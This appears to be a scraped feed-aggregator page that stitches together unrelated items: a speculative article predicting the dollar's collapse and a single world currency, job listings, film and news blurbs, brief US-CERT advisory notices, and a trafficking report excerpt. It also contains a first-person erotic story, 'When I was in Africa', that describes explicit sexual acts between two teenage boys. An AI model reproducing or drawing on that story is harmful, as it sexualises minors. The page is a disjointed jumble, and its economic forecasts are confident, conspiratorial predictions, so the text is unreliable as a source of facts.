This delusion has also recently bled into parts of the alternative economic movement, with some analysts hoping that the Trump Administration will somehow reverse several decades of central bank sabotage in only four to eight years.

However, this thinking requires a person to completely ignore the prevailing trend.

Years before there was ever an inkling of a trade war, multiple nations were establishing bilateral agreements that would cut the dollar as the primary exchange mechanism. China has been a leader in this effort, despite it being one of the largest buyers of U.S. Treasury debt and dollar reserves since the 2008 crash. In the past few years, these bilateral deals have been growing in scope, starting small and then expanding into massive agreements on raw commodities. China and Russia are a perfect example of the de-dollarization trend, with the two nations forming a trade alliance on natural gas as far back as 2014. That agreement, which is expected to start boosting imports to China this year, removes the need for dollars as a reserve mechanism for international purchases.

Russia and parts of Europe, including Germany, are also growing closer in terms of trade ties. With Germany and Russia entering into the Nordstream 2 gas pipeline deal despite condemnations from the Trump Administration, we can see a clear progression of nations moving away from the U.S. and the dollar, and into a “basket of currencies”.

Energy Secretary Rick Perry has suggested that sanctions are possible over the Nordstream project, but trade war policies only seem to be hastening the international departure from the U.S. as the center of trade influence. American sanctions on Iranian oil support this argument, as China, Russia and much of Europe are working together to sidestep U.S. restrictions on Iranian crude.

China has even instituted its own petroyuan market, and the first shipments of oil from the Middle East to China paid for through a petroyuan contract occurred in August of this year. Mainstream economists like to point out the small portion of the global oil market that the petroyuan represents, but they seem to have missed the bigger picture entirely. The issue is, now an alternative to the petrodollar exists where none existed before. And this is the crux of the matter that needs to be examined: The trend towards alternatives, and all alternatives leading to centralization by global banks.

Beyond the shift away from the U.S. dollar as a global reserve, there is a new matter of alternative international payment systems. SWIFT (Society for Worldwide Interbank Financial Telecommunication) is a global network of “financial messages” between major banks, including central banks. Transactions are recorded through the SWIFT network, which allows fast confirmation of “messages” and updates of accounts across the world.

Originally founded in Brussels, for decades SWIFT has been the only such banking network with global capacity, and until recently the primary data centers have been in the U.S. and the Netherlands.

The U.S. government has exploited extensive economic control using influence on SWIFT, including mass surveillance of international financial transactions and denying countries like Iran access to SWIFT through sanctions. In the past, the U.S. has seized or frozen funds being transferred through SWIFT between banks outside of U.S. borders, including entirely legal transactions, indicating that the U.S. has overt control over the system. The world reserve status of the dollar, combined with U.S. influence over the most important tool in international banking transactions, has solidified U.S. fiscal dominance for many years.

But the dollar’s reign is quickly coming to an end, as global banks like the IMF seek to centralize monetary authority under a single world structure. The great illusion being perpetrated is that the “multi-polar world order” that is arising is somehow “anti-globalist”. This is simply not the case.

So, what is actually happening? The world is getting smaller as everyone EXCEPT the U.S. is consolidating economically. This includes alternatives to SWIFT.

Russia dumps U.S. Treasuries but maintains close ties to the IMF and BIS, calling for a world currency system under the IMF’s control. China does the same, increasing ties to the IMF through its SDR basket system, while cutting its ties to the dollar one by one. Europe is embracing closer trade with both Russia and China, working to defy U.S. sanctions.

Now, all of these nations are building new SWIFT-like networks in order to cut the U.S. out of the loop. In other words, the U.S. is becoming the bumbling villain of our global soap opera, and through its own hubris, it is setting the stage for its own destruction. The U.S. is acting as a catalyst, helping global banks by frightening enemies and allies into further centralization. At least, that is the narrative I suspect future historians will repeat.

As part of the effort to undermine U.S. sanctions on Iranian oil, the EU has established a program to construct a new SWIFT system outside of U.S. influence. It is a model that Russia, China and Iran have agreed to participate in, and the news has gone mostly ignored by the mainstream. The Wall Street Journal begrudgingly reported on the development but dismissed it as ineffective in thwarting U.S. sanctions. And this seems to be the consensus among the MSM – to shrug off or ignore the implications of an alternative SWIFT.

Dollar bias rears its ugly head once again, and the dangers of this kind of denial are many. The dollar can be, and is being, bypassed through bilateral trade deals. U.S. dominance of oil markets is being bypassed through alternative petro-contracts. And now, U.S. control of financial networks is being bypassed through alternative SWIFT programs. The only thread that is holding the dollar and, by extension, the U.S. economy together is the fact that these alternatives are not widespread yet. This will inevitably change.

So, the question is – When will it change?

I believe the pace of the trade war will dictate the pace of the de-dollarization shift. The more aggressive that tariffs become between the U.S. and China, Iran, Europe and Russia, the faster that already existing alternative systems will be implemented. Currently, the speed of the U.S.-China conflict suggests a move away from the dollar and into an international basket of currencies by the end of 2020, with the process taking approximately another decade to become concrete.  That is to say, the SDR basket system will act as a bridge over time to a new world reserve currency; a single global currency system.

With current tariffs encompassing at least half of Chinese trade, and the other half under threat if China retaliates in any way, I believe that it is only a matter of months before China uses its own dollar and treasury reserves as a weapon against the U.S. And, when this happens, China will not announce the move publicly, nor will the mainstream media pick up on the event until it is far too late.

Do not expect Europe to come to the aid of America if this happens. To me, it seems to be clear from the EU’s recent behavior that they plan to remain neutral, at the very least during escalation, if not fully side with China and Russia out of economic necessity.

Preparing for this event requires as much financial independence as possible. This means tangible alternatives to the dollar, like precious metals, and localized economies based on barter and trade. Once the dollar loses world reserve status the transfer of price inflation into the U.S. will be immense. Dollars held overseas will come flooding back into the country as they will no longer be needed for international exchange of goods and resources. This switch could occur very quickly, like an avalanche.

Again, do not expect much of a warning before foreign creditors dump dollar-based assets, and do not expect a large window of time before the negative effects are visible on Main Street.

*  *  *

If you would like to support the publishing of articles like the one you have just read, visit our donations page here.  We greatly appreciate your patronage.


          Consultant - Vulnerability and Penetration Tester - Valencia IIP Advisors - Toronto, ON      Cache   Translate Page      
Keep oneself updated on the latest IT Security news, exploits, hacks. Vulnerability- Penetration Tester*....
From Indeed - Tue, 09 Oct 2018 20:42:42 GMT - View all Toronto, ON jobs
          Consultant - Vulnerability and Penetration Tester - Valencia IIP Advisors - Ottawa, ON      Cache   Translate Page      
Keep oneself updated on the latest IT Security news, exploits, hacks. Vulnerability- Penetration Tester*....
From Indeed - Tue, 09 Oct 2018 20:42:57 GMT - View all Ottawa, ON jobs
          Chair de poule 2 : Les Fantômes d'Halloween Bande-annonce VF      Cache   Translate Page      
Sonny Quinn et son meilleur ami au collège, Sam, se font un peu d’argent en récupérant les objets dont les gens ne veulent plus. C’est ainsi qu’ils vont découvrir Slappy, une étrange marionnette de ventriloque tout droit sortie d’un livre Chair de poule jamais publié…
Slappy a très envie de faire partie de la famille Quinn auprès de Sonny, sa sœur Sarah et leur mère Kathy, mais ses exploits malfaisants vont beaucoup trop loin. Les enfants réalisent vite qu’ils doivent à tout prix arrêter ce pantin diabolique. Slappy décide alors de se fabriquer la famille dont il rêve… en enlevant madame Quinn et en ramenant à la vie tous ses horribles complices d’Halloween.
Alors que leur petite ville tranquille se transforme en enfer peuplé d’une armada de monstres en tous genres, des plus terrifiants aux plus hilarants, les enfants et leur voisin, M. Chu, vont tout faire pour sauver leur mère et la ville des plans machiavéliques de l’épouvantable marionnette déchaînée…
          Consultant - Vulnerability and Penetration Tester - Valencia IIP Advisors - Ottawa, ON      Cache   Translate Page      
Perform security audits, risk analysis, vulnerability testing (including penetration testing and the development of exploits), and security reviews periodically...
From Indeed - Tue, 09 Oct 2018 20:42:57 GMT - View all Ottawa, ON jobs
          Calls for legal migrant prostitution after research finds some exploited      Cache   Translate Page      
Researchers are calling for migrant prostitution to be legalised after finding some sex workers were raped, not paid or had their passports withheld.
          Democrats Can Exploit the ‘McCain Divide’ in the GOP      Cache   Translate Page      
This piece is only available to Political Wire members. Your support makes this site possible. Join today for the complete Political Wire experience and get exclusive analysis, new features and no advertising. Sign in to your account or join today! Join for just $5 a month or $50 a year.
          The Fat Bear Week finals are here. Which fat bear will reign supreme?      Cache   Translate Page      

The Fat Bear Week finals are here. Which fat bear will reign supreme?Welcome to Fat Bear Week at Mashable! Each fall, Katmai National Park holds a competition as Alaska’s brown bears finish fattening up for their long winter hibernation. This year, Mashable is getting in on the salmon-munching action. Check back with us all week as we follow the fat bear face-offs each day, and remember to get your votes in for each round. Happy fishing! After six days of strong competition, the Fat Bear Week finals have arrived. Katmai National Park, where these wild bears live and hibernate, amusingly calls the pinnacle of the week-long contest "Fat Bear Tuesday."  This year's Tuesday match features two profoundly fat bears, both of whom clearly exploited a Brooks River that teemed with 2018's exceptional and long run of 4,500-calorie salmon.  The showdown features Bear 409, known as "Beadnose," a former Fat Bear Week Champion who delighted the internet last week after Katmai posted images of her dramatic summertime fattening. In years past, Bear 409 has successfully raised cubs. But this year, the cub-less bear didn't need to sacrifice any fish to her largely helpless offspring. Image: Dustin drankoski/bob al-greene/mashableHer competitor, Bear 747 — who really has no need for a nickname — is the fattest bear Katmai ecologist Mike Fitz has ever seen.  "He seems to be more hippopotamus than bear at times," Katmai ranger Andrew Lavalle noted last week. Voting opened at 10 a.m. ET on the Katmai Facebook page, and the winner will be announced at 7 p.m. ET.  To vote, simply click on the images of the bear you choose as the 2018 champion, and then "Like" that image. Your "Like" is your official vote. To help you place an informed vote, see the ursine comparisons below. Bear 747Image: nps Bear 747Image: nps Bear 409Image: nps Bear 409Image: nps Here are other images of each bear, to clear up any uncertainties as to which bear has fattened up the most this summer.  Bear 409Image: nps Bear 747Image: npsWhoever becomes the crowned champion, each of these bears — all 13 in the competition — have shown to be well-prepared for the long, unrelenting, Alaskan winter. They won't eat for six months, and during that time will lower their metabolisms in profound ways.  In their coma-like state, the bears gradually consume their ample fat stores, and awake each spring in remarkably good health. But when they emerge from their dens, both bears 409 and 747 will be quite skinny.  They'll likely return to Katmai Brook's river and start fishing, obsessively, once again. WATCH: Ever wonder how the universe might end?



          Yarni & Javi – Sakura [EXPDIGITAL173]      Cache   Translate Page      
ARTIST: Yarni & Javi TITLE: Sakura RELEASE DATE: 2018-09-24 LABELS: Exploited STYLE: Deep House FORMAT: MP3 QUALITY: 320kbps SIZE: ~30.8 Mb Tracklist: Yarni & Javi – Next Of Kin (Original Mix) 6:14 /118bpm/ Dmin Yarni & Javi – Sakura (Original Mix) 6:56 /120bpm/ D#min
          Machiniste - Groupe G7 - Sept-Îles, QC      Cache   Translate Page      
Sous la direction du directeur d'usine, le ou la machiniste devra:. Mettre en place et exploiter des machines de coupe et de meulage de précision en métal...
From Indeed - Tue, 09 Oct 2018 18:20:11 GMT - View all Sept-Îles, QC jobs
          Machiniste - Groupe SFP ressources humaines - Fermont, QC      Cache   Translate Page      
*ArcelorMittal Exploitation minière Canada s.e.n.c.* est le numéro un mondial de l’exploitation sidérurgique et minière et compte plus de 220 000 employés... $39.76 - $45.10 an hour
From Indeed - Wed, 01 Aug 2018 19:33:47 GMT - View all Fermont, QC jobs
          Les petits nouveaux du Marché des Producteurs      Cache   Translate Page      
Le Marché des Producteurs de Nouvelle-Aquitaine est de retour, et ce jusqu’à la fin du Salon de l’Agriculture. Marque des Chambres d’Agriculture, la dizaine de vendeurs présents n’y proposent que ce qu’ils produisent sur leur exploitation. Cette année, les stands, disposés autour d’une grande tablée centrale, ont fait place à des petits nouveaux. La vingtaine, Sacha Lacour-Arjeau, de l’élevage de Barthes, basé à Camarsac (33), vient pour la première fois au Marché pour présenter ses volailles, comme la jeune Floriane Laville, productrice de fruits rouges à Bruges (33). Jean-Pierre Gastellou, de la Maison Gastellou, de Saint-Jean-Pied-de-Port (64), propose sa charcuterie et ses gâteaux basques à la vente.
          The National Rifle Association recruits LGBTQ gun owners even as it denigrates community      Cache   Translate Page      

National Rifle Association national spokesperson Dana Loesch continued the group’s tactic of offering surface-level support for LGBTQ gun ownership while simultaneously spouting attacks against the LGBTQ community from the organization’s news outlet, NRATV.

During the October 5 edition of her NRATV show Relentless, Loesch highlighted the “LGBTQ community and Second Amendment advocates working together” at the 33rd Annual Gun Rights Policy Conference in Chicago, where pro-gun LGBTQ groups the Pink Pistols and Operation Blazing Sword announced their merger.

Loesch claimed that gun ownership “is an obvious fit for the LGBT community” and owning a gun is about “refusing to be a victim, whether you’re part of the gay community, or an ethnic minority, or whether you’re a single woman”:

DANA LOESCH (HOST): Any group that is more susceptible to violence will obviously and clearly want to protect itself. And that’s exactly why supporting the human right to self-defense is an obvious fit for the LGBT community.

LOESCH: That’s really what this is all about -- refusing to be a victim, whether you’re part of the gay community, or an ethnic minority, or whether you’re a single woman. I mean, it’s not about identity politics. But some individuals, and I’ve described before the perpetrator behind Pulse nightclub, or the individual who killed a teenager in the East Coast before then targeting a gay club in Seattle and said that he did it specifically because their lifestyles were antithetical to his radicalized beliefs. It does exist and it has happened in the United States. It’s not about identity politics, it’s about protecting yourself and other individuals.

While she encourages members of the LGBTQ community to own firearms, Loesch has also promoted hateful and anti-LGBTQ rhetoric in the past -- comparing an anti-gay baker having to serve a gay couple to “slavery” and claiming that transgender individuals have a “mental illness.”

Referring to Chelsea Manning, a transgender woman, Loesch said earlier this year on NRATV, “Just because you get some boobs, and you put some red lipstick on, poorly applied, and a very poor smoky eye bad dye job, that don’t make you a chick.”

National Rifle Association board members and organization leaders have a well-documented track record of espousing bigoted and homophobic rhetoric toward LGBTQ people while also exploiting violence against them to promote fear and increased gun ownership, a strategy that enrichens gun manufacturers that donate to the NRA.


          Sélection - Les meilleurs casques micros pour jouer      Cache   Translate Page      
MAJ du 10/10/2018 : Ajout à la sélection du casque Plantronics RIG 500 Pro, qui se décline en trois variantes et s'impose comme l'un des modèles les plus polyvalents du moment. En matière de jeu vidéo, l’image est l’un des principaux vecteurs d’immersion et de plaisir, mais il ne faut pas nier l’importance que revêt le son. Les grands amateurs de bandes originales oniriques (et d’explosions à s’en faire saigner les tympans) que nous sommes s’en portent témoins. Tous les casques de cette sélection sont compatibles PC. La PlayStation 4 / Pro (qui propose un port Jack sur sa manette DualShock 4) nécessite un casque proposant un Jack 3,5 mm 4 pôles pour pouvoir exploiter son et micro en même temps. Sur Xbox One / X, sachez qu’outre les périphériques signalés comme compatibles, la plupart peuvent fonctionner soit en utilisant le port Jack présent sur les manettes récentes, soit en utilisant l’adaptateur de casque stéréo pour manette Xbox One (accessoire vendu 23€) sur les premières manettes Xbox One dépourvues de Jack .Par Cliint (Matthieu Chartier) et BobaFett (Jean-Marc Delprato) A lire également : Comment bien choisir son casque-micro ?
          How to Use Fail2ban to Secure Your Linux Server      Cache   Translate Page      

TecMint: By reviewing your server logs, you may often find different attempts for brute force login, web floods, exploit seeking and many others.


          Movies I Watched in August, Part 2      Cache   Translate Page      
Wrapping things up for the much-overdue August recap. Look for the September movies soon, because I've got an plan that might make these reviews a tad more current...


Rumor has it this was one of Stanley Kubrick’s favorite movies, and it’s not hard to see why. Though it’s a comedy – and a hilarious one – it’s also an oft-excruciating vivisection of, as the title says, modern romance, circa 1981. Albert Brooks stars, directs and co-writes (with Monica Johnson) the story of Robert Cole, a Hollywood editor stuck in an on-again, off-again, on-again, etc. relationship with the much more stable Mary Harvard (Kathryn Harrold). It’s deceptively low-key and simple, with no crazy plot twists to get in the way of Brooks’ breathtakingly neurotic (and endless) worrying. The movie starts with Brooks confidently dumping her, then charts his descent into madness as he schemes to get her back. Though it’s packed with some telltale ‘80s elements – Quaaludes, jogging, cocaine at parties – it’s oddly timeless in its themes of obsession, desire and insecurity. Most of all, like I said, it’s truly hilarious, possibly Brooks’ most consistently funny film (which is really saying something). Even beyond the relationship stuff, there’s also a very funny scene where Bob Einstein (aka Marty Funkhouser, aka Brooks’ big brother) pressures Albert into buying way too much jogging paraphernalia and some classic sequences involving the editing work, with wonderful support from Bruno Kirby, James L. Brooks and, believe it or not, George Kennedy. One of the great comedies of the 1980s, to be sure, and probably all time.


It’s always risky to make a statement like this about a movie, especially when it’s practically brand-new, but I honestly thing this might be one of the best action films I’ve ever seen. It’s packed with jaw-dropping sequences, including a fight in a bathroom that ranks with some of the best close-quarter combat of all time (and even remembers to include a crucial plot point about a mask-making device). Most of the hype surrounding “Mission: Impossible – Fallout” involved star Tom Cruise’s almost extra-human dedication to the film, performing death-defying stunts and working tirelessly to make the movie succeed. Though I’m skeptical of Cruise’s involvement with a certain religion, there’s no denying he really makes this movie something special. It’s more than the stunts and action scenes, though, and by the time we got to the (truly spectacular) helicopter chase that ends the film, I think I realized what it is: Cruise’s character, Ethan Hunt, has an almost supernatural confidence that, somehow, doesn’t come across as arrogant. It’s simply a belief that he can (and will) save the day, not matter how the odds are stacked against him (and, of course, by the end, they’re stacked pretty damned high). It’s like Kirk in “Wrath of Khan” – he just doesn’t believe in the no-win scenario. It sounds silly, and maybe it is, but by the time he’s hanging from a rope under a speeding helicopter, I was 100 percent with him.


If there were any justice in this world, the fine folks at Something Weird Video would win one of those honorary Oscars for their contribution to film history, namely saving (and releasing) hundreds of insanely obscure, insanely strange movies that otherwise would never see the light of day. For instance, this 1968 sexploitation non-classic about a sketchy lesbian gang that kidnaps the boy-toy of a rich woman, who hires a private eye to track him down. As is usually the case, the plot itself if a fragile skeleton upon which the filmmakers (writer Diana Paschal and uncredited director Harry Wuest) hang endless scenes of semi-nude dancing, semi-nude wrestling and other semi-nude activities. It’s a terrible movie by any sane, objective measure, but it is fascinating if you’re a fan of these things. The whole movie, with it’s out-of-nowhere violence and girl gang aesthetic, resembles a bargain-basement version of a Russ Meyer movie – though it's nowhere near as good. And special credit must be given to actress Marni Castle, who plays both Brenda McClain (the aforementioned wealthy woman) and girl gang leader “Big Shim.” She’s not exactly talented, but she is oddly convincing, especially as the grotesque, imposing “Big Shim.”


Ayn Rand’s philosophy is silly, and this movie is even sillier, but thanks to a great cast and some eye-popping direction by King Vidor (which, come to think of it, sounds like the name of an Ayn Rand character), this might be one of the most purely entertaining movies of Hollywood’s golden age. Gary Cooper plays Howard Roark, put-upon architect who refuses to bend to the whims of the masses. Patricia Neal plays Dominque Francon, Randian woman who refuses to be tamed (unless Roark is the one taming her). And, rounding out the holier-than-thou trilogy, Raymond Massey plays Gail Wynand, the oddly named, oddly motivated newspaper publisher who seemingly lusts after both of them. Add to that trio the movie’s wonderful pair of weasels – Roark’s weak-willed buddy Peter Keating (Kent Smith of “Cat People”) and scheming columnist Ellsworth Toohey (Robert Douglas, in a hilariously scenery chewing performance). You can barely believe what’s happening and how these decidedly non-human characters are reacting, but you also can’t look away – it’s so damned much fun. Until someone does a big-budget, black-and-white adaptation of Steve Ditko’s “Mr. A,” it’s going to remain unique in movie history.


Rewatched this with my old Out of Theaters co-host BillyKulpa, and we were both amazed by just how disappointing it was. I like Daniel Craig, and I loved “Skyfall,” but this one, woof. It just didn’t hold our interest, which is the bare minimum I require in a James Bond movie. (Even "Tomorrow Never Dies" managed that simple trick.) Let’s hope the next one is a big improvement. (Nice poster, though.)

Coming up soon: Frank Reynolds! Lee Tracy! Darla Hood (as an adult)! David Soul! And a Marvel double feature!


          National Air & Space Intelligence Center (NASIC) Info Session      Cache   Translate Page      

The National Air and Space Intelligence Center is the DoD’s center of excellence for foreign air and space threats. We have over 3000 people working together daily to make sure the Nation is at the cutting edge of understanding foreign threats to US Air and Space operations. Our all-source analysts are national experts on threats that span air, space and cyberspace domains and NASIC is a recognized innovator in data exploitation, knowledge management, and large data storage. The Center’s world-class connectivity ensure we have the physical access to key mission data and partnerships throughout the IC.

Please RSVP for this event in Handshake. 


          L’armée brésilienne face à l’exploitation illégale d’or      Cache   Translate Page      
Alors que l’extraction illégale de l’or est devenue l’un des principaux défis de l’armée brésilienne dans le centre-ouest du pays, le lieutenant Wagner Pinheiro dos Santos a évoqué dans une interview à Sputnik la lutte des forces de l’ordre contre ces activités criminelles. Le lieutenant Wagner Pinheiro a évoqué dans un entretien accordé à Sputnik ...
          Stage : Opportunités De Carrière : Stagiaire Communication - Stratégie De Marques H/F (10267)      Cache   Translate Page      
Faisons connaissance Le Groupe TF1 exploite des chaînes de télévision en France. Mais le Groupe ne compte pas que ses chaînes, TF1 a engagé depuis plus de 25 ans une diversification de ses activités et compte près de 30 filiales dans des métiers...
          Comment on Rutherford asks why the Government won’t act on petrol prices by Right of way is Way of Right      Cache   Translate Page      
Imagine if NZ had it's own oil and gas reserves to exploit, as a domestic level of production may help to offset high prices for overseas oil. Wouldn't that be good. Sadly any evidence of common sense in this Government is harder to find than any online reference anywhere to Megan Wood's son on a Labour Party website. Or Facebook.
          Dessinateur mécanique - SNC-LAVALIN INFRASTRUCTURE - Montréal, QC      Cache   Translate Page      
Nous offrons une expertise technique intégrée et multidisciplinaire permettant de concevoir, construire et exploiter de nouvelles infrastructures de transport....
From SNC-LAVALIN INFRASTRUCTURE - Tue, 09 Oct 2018 23:16:12 GMT - View all Montréal, QC jobs
          Dessinateur mécanique - SNC-LAVALIN INFRASTRUCTURE - Montréal, QC      Cache   Translate Page      
Nous offrons une expertise technique intégrée et multidisciplinaire permettant de concevoir, construire et exploiter de nouvelles infrastructures de transport....
From SNC-LAVALIN INFRASTRUCTURE - Tue, 09 Oct 2018 23:16:12 GMT - View all Montréal, QC jobs
          ✌ Microsoft Releases October 2018 Security Updates | US-CERT      Cache   Translate Page      
✌ Microsoft Releases October 2018 Security Updates | US-CERT:

Microsoft has released updates to address multiple vulnerabilities in Microsoft software. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.


          ✌ Adobe Releases Security Updates | US-CERT      Cache   Translate Page      
✌ Adobe Releases Security Updates | US-CERT:

Adobe has released security updates to address vulnerabilities in Adobe Digital Editions, Framemaker, and Technical Communications Suite. An attacker could exploit these vulnerabilities to take control of an affected system.


          ✌ Apple Releases Security Updates for iCloud, iOS | US-CERT      Cache   Translate Page      
✌ Apple Releases Security Updates for iCloud, iOS | US-CERT:

Apple has released security updates to address vulnerabilities in iCloud for Windows and iOS. An attacker could exploit some of these vulnerabilities to take control of an affected system.NCCIC encourages users and administrators to review the Apple security pages for iCloud for Windows 7.7 and iOS 12.0.1 and apply the necessary updates.


          UAE Personal Care Products Market is Set to Augment at a CAGR of 5.3%      Cache   Translate Page      
(EMAILWIRE.COM, October 10, 2018 ) UAE personal care products market is expected to expand at a CAGR of 5.3% over the forecast period, 2017-2025 to harness USD 4.8 billion by 2025. High disposable income of people in the UAE and intense competition between major brands to exploit the opportunities...
          Amazon Employee Fired for Leaking Customer Data, Exposing a Search Flaw or Both?      Cache   Translate Page      

Amazon revealed a breach of customer data last week, but it wasn’t a data breach of the usual variety. Rather than falling prey to a cyberattack or having hackers exploit unsecured code, customer email addresses were leaked by an employee to an online reseller in exchange for money. What you need to know: 1.) A […]

The post Amazon Employee Fired for Leaking Customer Data, Exposing a Search Flaw or Both? appeared first on Adam Levin.


          ‘Sanctuary cities’ don’t care when restaurants exploit undocumented workers – Chicago Sun-Times      Cache   Translate Page      
Chicago Sun-TimesAs I read the article “Chinatown job agencies, Asian restaurants ‘exploit’ Latinos, say workers, suit” (Oct. 7), two questions came to mind regarding Chicago and other sanctuary cities like San Francisco. On the one hand, is sanctuary first and … …read more Source:: Chicago Restaurant News From Google News
          Heresy / Melissa Lenhardt.      Cache   Translate Page      
cover image"Margaret Parker and Hattie LaCour never intended to turn outlaw. After being run off their ranch by a greedy cattleman, their family is left destitute. As women alone they have few choices: marriage, lying on their backs for money, or holding a gun. For Margaret and Hattie the choice is easy. With their small makeshift family, the gang pulls off a series of heists across the West. Though the newspapers refuse to give the female gang credit, their exploits don't go unnoticed. Pinkertons are on their trail, a rival male gang is determined to destroy them, and secrets among the group threaten to tear them apart. Now, Margaret and Hattie must find a way to protect their family, finish one last job, and avoid the hangman's noose."-- Provided by publisher.
          10/10/2018: Business: Why Chorus shares climbed amid exploitation claims      Cache   Translate Page      
As the NZX50 fell 0.7 per cent on Monday, Chorus shares rose 1.03 per cent to $4.90 — close to the lines company’s all-time high of $5. Why did Chorus buck the market trend, despite claims from the Labour Inspectorate (part of MBIE) that 73 of its 75...
          Nicky Sunshine Brings Solo Show CONFESSIONS OF A MASSAGE PARLOR MADAM to Broadway Comedy Club      Cache   Translate Page      

Actress / comedian Nicky Sunshine brings her solo comedic performance "Confessions of A Massage Parlor Madam" back to the Broadway Comedy Club (318 W. 53rd Street) on Sunday, October 21, 2018. Produced by Top Knotch Entertainment, admission to the 6:00pm show -- is $15.00 in advance, $20.00 at the door with a one-drink minimum per person. A post show talkback focusing on violence against women, addiction, self help and sex work is scheduled. For information and reservations, go to: https://nickysunshine.com/ or call (347) 766-3001.

The 60-minute "Confessions," which is directed by Chuck Burks, is described by Nicky as "a funny, poignant look at the period she spent as a sex worker upon arriving in New York in 2002." The show - which contains adult themes, language and content - received great reviews at its 2016 premiere in Harlem and has been performed in front of sold out houses at The Producers Club and the National Black Theatre in Manhattan.

"Nicky Sunshine radiates her multiple talents in "Confessions of a Massage Parlor Madam". A brilliantly crafted one-woman tour de force! This show is intelligent, funny, honest, sometimes shocking, and hauntingly hilarious. A one of a kind journey with a massage...Ahem...message. I highly recommend it."

"Confessions" is part testimony, part cautionary tale where I try to bring awareness to such important, timely issues as abuse, trafficking and violence," says Nicky. "I feel that the show has resonated with audience members, has given me the opportunity to discuss these issues with national media personalities including syndicated radio host Tom Joyner (Tom Joyner Morning Show), Joy Ann Reid (MSNBC), Jacque Reid (BET / "Reid this Reid That" podcast) and to raise money for organizations including the "Chicago Alliance Against Sexual Exploitation (CAASE) and Northwestern University Entertainment Alliance, "she added.

A Virginia native who graduated from Northwestern University, Nicky has appeared in numerous productions including NBC's "Saturday Night Live"," the Netflix original series "The Break with Michelle Wolf" and "The Vagina Monologues" at New World Stages. She has also performed on and produced several comedy shows in major NYC venues such as Nick Cannon's Fresh Faces at Gotham Comedy Club. The Times Square Arts Center and Stand-Up New York. Her reality show "A Question of Love" aired on Tuesdays on the FYI Network. "Let's Get Greedy!" - Nicky's weekly adventures as a comedic food critic searching for food and fun in New York City is broadcast weekly on Friday evenings @ 11pm (EST) on Manhattan Neighborhood Network (MNN).

Broadway Comedy Club is located in the Hell's Kitchen / Theatre District of Manhattan on 53rd Street between 8th & 9th Aves. Take the "C," "E" or #1 subway to 50th Street. For more information, call: 212-757-2323.


          Technicien au centre d'assistance - français / anglais / espagnol / portugais - CGI - Montréal, QC      Cache   Translate Page      
Bonne connaissance des systèmes d'exploitation Windows NT, XP, Vista, 7. Description du poste :....
From CGI - Fri, 13 Jul 2018 15:12:47 GMT - View all Montréal, QC jobs
          When I was in Africa      Cache   Translate Page      
When I was a teenager my father worked for an oil company and he would be sent overseas for months at a time. My parents were divorced and I lived with my father. When he was sent overseas and I was not in school I would accompany him. One time he was sent to Africa and I accompanied him. We stayed in a company rented house and there was a caretaker who took care of the house and did what ever household chores needed doing. His name sounded like Tekis. He was a black man in his early 30's who was very friendly and fun to be around. He was like family to us and we were special to him as well.

When my father would be working in the field sometimes I could accompany him but when he was in the office I had to stay home. Tekis and I became good friends and I learned a great deal about his background and his family. Because we became close as family sometimes Tekis would bring his son to stay with us. His son was named Ande and he was about my age, very outgoing and had a warm personal style that made everyone feel like he was their special friend. We became very good friends and enjoyed hearing about each others country, childhood and plans for the future. When ever Ande stayed over we would stay up late and watch movies and play games.

When Ande would stay over he would stay in my room. My room had two beds, a queen sized bed I slept on and a single bed where Ande slept. We were young boys who shared a bathroom and bedroom and we would change in each others presence and were very comfortable together. Often at night when it was time to go to bed we'd both take a shower and then we'd be on my bed in our underwear talking till it was time to go to bed, then Ande would go to his bed to sleep.

One night we were up very late and we had been watching a movie that had a number of sex scenes and when we went to the bedroom the topic of girls and sex came up. I had fooled around with a few girls but never made it all the way to intercourse. Ande had more experience than I which seems to be a cultural thing. We were talking about what we had done sexually and very naturally Ande asked me if I had ever done anything with another boy. I said "no" and he told me about how he and some friends had been naked together and had touched each other and that one of his friends like to give head. It didn't seem like a bad thing to me. I think he could tell I wasn't offended and was interested as he told me about his exploits. Just as naturally as Ande asked me if I had done anything with another boy, he asked if I would I would like him to suck me. I was very horny from our discussion and I said yes, but I was scared just because I had no idea what it would feel like and the whole thing seemed risque. He told me to take my underwear off. I slipped my underwear off and laid back and suddenly I felt his warm mouth on the head of my circumcised penis. He just took the head in his mouth and just moved his tongue around slowly. It felt really good. I was just laying there enjoying how good it felt. When I masturbated I would do it very fast and get to an orgasm as quickly as I could. But this was different. I wasn't even thinking about having an orgasm. What Ande was doing just felt good but it was slow and for the longest time it just felt the same, very good, and I just laid back and thought at some point he would just stop. But eventually I could feel that feeling starting to build and finally I came in his mouth. I wasn't even thinking that I would come in his mouth, I was just absorbed in my own feelings. When he stopped and laid next to me I could see that he had an erection and I felt like I owed him something so I asked if he would like me to suck him. He said "of course" and he slipped off his underwear. I put my face down by his cock and it was beautiful and scary at the same time. I didn't really know what to do. I took his cock into my mouth and did for Ande what he did for me. But it wasn't long and his hips started thrusting back and forth. I guess I didn't do it very well because he slipped his hand down and started to stroke his cock as I swirled my tongue around his head. Stroked harder and harder and then when he was ready to cum he pushed my head away and he came on his stomach. We laid there together for a while and then he got up and went to the bathroom and cleaned himself up. When he came back he asked if I'd like it if he slept in my bed and I said yes. We got under the covers and talked a bit more about sex and touched each other. It was so nice having him in my bed, being able to touch his beautiful smooth black body and have his hands exploring my body. I loved touching his balls and penis, and running my hands over his smooth thighs and chest.
          Re: Sex tourism in Gambia...      Cache   Translate Page      
From www gvnet.com I transfer the fllowing passage.

Human Trafficking and Modern-day Slavery

The Gambia is a source, transit, and destination country for children and women trafficked for the purposes of forced labor and commercial sexual exploitation. Within The Gambia, women and girls, and to a lesser extent boys, are trafficked for sexual exploitation, in particular to meet the demand for European sex tourism, and for domestic servitude. Boys are trafficked within the country for forced begging by religious teachers and for street vending. Transnationally, women, girls and boys from neighboring countries are trafficked to The Gambia for the same purposes listed above. Primary source countries are Senegal, Mali, Sierra Leone, Liberia, Ghana, Nigeria, Guinea-Bissau, Guinea and Benin. Trafficking of Gambian boys to Senegal for forced begging and Senegalese boys to The Gambia for the same purpose is particularly prevalent. Gambian women and girls are trafficked to Senegal for domestic servitude, and possibly for sexual exploitation. Gambian women and children may be trafficked to Europe through trafficking schemes disguised as migrant smuggling. Reports in the last two years of Gambian, Senegalese, and nationals of other neighboring countries being transported from The Gambia to Spain by boat appear to be predominantly cases of smuggling rather than trafficking. - U.S. State Dept Trafficking in Persons Report, June, 2008 [
          Campaign Workers Unionize to Get Higher Pay, Severance and Even Warmer Offices       Cache   Translate Page      

